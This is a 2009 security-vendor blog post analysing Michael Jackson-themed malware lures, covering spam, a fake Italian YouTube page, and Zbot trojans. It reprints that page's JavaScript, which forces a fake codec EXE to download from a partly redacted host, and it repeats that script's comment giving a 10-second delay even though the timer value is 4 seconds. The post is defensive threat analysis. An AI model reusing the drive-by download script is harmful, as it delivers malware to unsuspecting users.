International MJ Conspiracies With a Payload
Yes, sadly we're still talking about people taking advantage of Michael
Jackson's death.
This week, we've seen a rise in malware purporting to show images and video
leading up to Michael's death many malware groups around the world appear to
be getting in on the act.
MJ X-Files Mail Message
MJ X-Files Web Content
Anyone taking the standard precautions shouldn't have difficulty avoiding this
one just make sure Javascript is disabled by default (so you don't get
infected by Mal/ObfJS-BP as found in the 1×1 iFrame it tries to download and
run the EXE via an old Acrobat Reader vulnerability), and don't run the linked
EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea,
right?) and get infected with Troj/ZBot-GJ.
While most of the malware is following this format, the Italians are getting a
bit more creative:
MJ Italian Video Message
For those of you following along who don't read Italian, my rough translation
of the text is as follows:
The whole world was devastated when and Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the
mega star is dead.
But not just that. The following video clip shows Michael's last moments and
the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael's grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16
This message contains a link to the following site:
The site, purporting to be an Italian YouTube site, throws up an error saying
that you need to update your Flash player to view the video
with a download
link to fake Codec malware Troj/ZBot-GK. It also contains the following
Javascript code that I found very interesting:
<!--
function doDownload() {
/Genera il link al file zippato da scaricare
(tr. Generate the link to the zipped file to download)
location.href = "http://youtube****.com/Codec/120.exe";;
}
/Fa partire il download dopo 10 secondi da quando
/l'intermprete JavaScript ha rilevato la funzione
(tr. The download starts 10 seconds after the JavaScript interpreter has taken
over the function)
window.setTimeout("doDownload()", 4000);
/>
This associated code essentially forces the linked codec to download and
possibly run after ten seconds of inactivity on the page. What I find
interesting is that the script is well formatted and commented in Italian, and
appears to be designed to force download a zip file. This implies that you can
expect to see other Italian-targeted malware of this kind in the future.
You're still safe as long as you keep Javascript disabled for untrusted
websites and don't download the EXE. But downloading the "update" can be a bit
more tempting than the previous example.
Not to worry
Sophos blocks the e-mails, the websites, and the malware, so
reading this blog is likely the closest you'll come to this sordid display of
opportunism.
Posted on June 30th, 2009 by Andrew Ludgate, Threat Researcher, SophosLabs,
Canada
